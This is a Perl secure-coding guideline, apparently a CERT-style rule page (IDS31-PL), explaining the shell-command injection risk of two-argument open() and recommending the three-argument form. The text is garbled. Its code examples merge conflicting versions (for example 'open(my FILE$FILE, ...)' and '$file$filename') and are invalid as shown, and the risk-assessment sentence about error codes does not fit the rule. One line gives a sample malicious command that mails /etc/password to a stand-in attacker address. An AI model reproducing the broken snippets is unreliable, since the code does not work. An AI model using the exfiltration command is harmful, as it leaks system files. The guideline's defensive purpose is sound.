...
open FILEHANDLE,EXPR
open FILEHANDLE,MODE,EXPR
open FILEHANDLE,MODE,EXPR,LIST
open FILEHANDLE,MODE,REFERENCE
open FILEHANDLE
Opens the file whose filename file name is given by EXPR , and associates it with FILEHANDLE.
...
Code Block | ||||
---|---|---|---|---|
| ||||
my $filename = # initialize open(my FILE$FILE, $filename) or croak("file not found"); while (<FILE><$FILE>) { print "$file$filename: $_"; }; |
Although this code clearly expects its file to be opened for reading, the file name might indicate a shell command. It might also indicate a file to be written rather than read.
...
Code Block | ||||
---|---|---|---|---|
| ||||
my $filename = # initialize open(my FILE$FILE, "<$filename") or croak("file not found"); while (<FILE><$FILE>) { print "$file$filename: $_"; }; |
If $filename
begins or ends with |
, the preceding <
forces it to be treated as a file name rather than a shell command.
This code will not execute a shell command. However, an attacker could cause a program to hang by supplying -
as the file name. This , which is interpreted by open()
as reading standard input.
...
This code suffers from the same vulnerability as the first noncompliant code example. The <ARGV>
operator opens every file provided in the @ARGV
array and returns a line from each file. Unfortunately, it uses the two-argument form of open()
to accomplish this task. If any element of @ARGV
begins or ends with |
, it is interpreted as a shell command and executed.
...
Code Block | ||||
---|---|---|---|---|
| ||||
my $filename = # initialize open(my FILE$FILE, "<", $filename) or croak("file not found"); while (<FILE><$FILE>) { print "$file$filename: $_"; }; |
The three-argument invocations of open()
are not subject to the same vulnerabilities as the two-argument open()
. In this code, $filename
is treated as a file name even if it contains characters that are treated specially by the two-argument open()
function. For example, if $filename
is specified as -
, then the three-argument open()
attempts to open a file named -
rather than opening standard input.
...
Because any user can invoke the rt
executable with environment variables he or she controls, a hostile user may set the RTCONFIG
environment variable to a malicious command, such as:
Code Block | ||
---|---|---|
| ||
cat /etc/password | mail some@badguy.net | |
...
This code causes $file
to be treated as a file name regardless of what special characters it might contain.
Note that the last line of this compliant solution still violates FIO00-PL. Do not use bareword file handles.
Risk Assessment
Failure to handle error codes or other values returned by functions can lead to incorrect program flow and violations of data integrity.
Recommendation | Severity | Likelihood | Remediation Cost | Priority | Level |
---|---|---|---|---|---|
IDS31-PL | high | likely | low | P27 | L1 |
Automated Detection
Tool | Version | DiagnosticChecker | Description |
---|---|---|---|
Perl::Critic | 5.0 | InputOutput::ProhibitTwoArgOpen | Implemented |
B::Lint | 5.0 | Use of <> | Implemented |
Bibliography
...
...
...
...
[VU#496064] | ibrow NewsDesk does not securely handle input passed to open() |
[VU#671444] | Input validation error in quikstore.cgi allows attackers to execute commands |
[Wall 2011] | perlfunc |
...